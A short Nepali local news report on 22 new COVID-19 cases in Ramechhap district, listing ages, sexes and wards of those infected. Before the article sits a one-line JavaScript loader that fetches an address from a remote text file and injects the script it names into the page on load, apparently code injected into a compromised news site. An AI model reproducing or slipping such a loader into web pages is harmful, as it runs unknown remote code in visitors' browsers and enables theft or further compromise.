;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज २७,
रामेछाप । रामेछाप जिल्लामा मंगलबार थप २२ जनामा कोरोना पुष्टि भएको छ । जिल्ला अस्पताल रामेछाप विज्ञप्तिमार्फत दिएको जानकारी अनुसार मन्थली नगरपालिकाका २० जनामा संक्रमण देखिएको हो ।
जसमा संक्रमित हुनेमा ४६,४६,१९,३२,२४,२४,५८,वर्ष उमेरका वडा नं ७ का महिला छन् । त्यस्तै ४५,३९,२६,१३,२४,३५,३६,१५,५४,२८,वर्षका पुरुषहरु वडा नं ८ का रहेका छन् ।
७१ वर्षीय पुरुष लिखु तामाकोशी गाउँपालिका वडा नं ६ का ३९ वर्षीय छन् । ११ जना महिला र ११ जना पुरुष गरी २२ जनामा संक्रमण देखिएको हो ।
जसमा जिल्ला बाहिर स्वाब संकलन गरी पोजेटिभ हुनेको संख्या ३ जना छ । एक जना लिखु तामाकोशी गाउँपालिका वडा नं ३ नागदह र बेथानकी ३३ वर्षीय महिला छिन् । त्यस्तै ४२ वर्षीय परुष रहेका छन् ।
फेसबुक प्रतिक्रियाहरु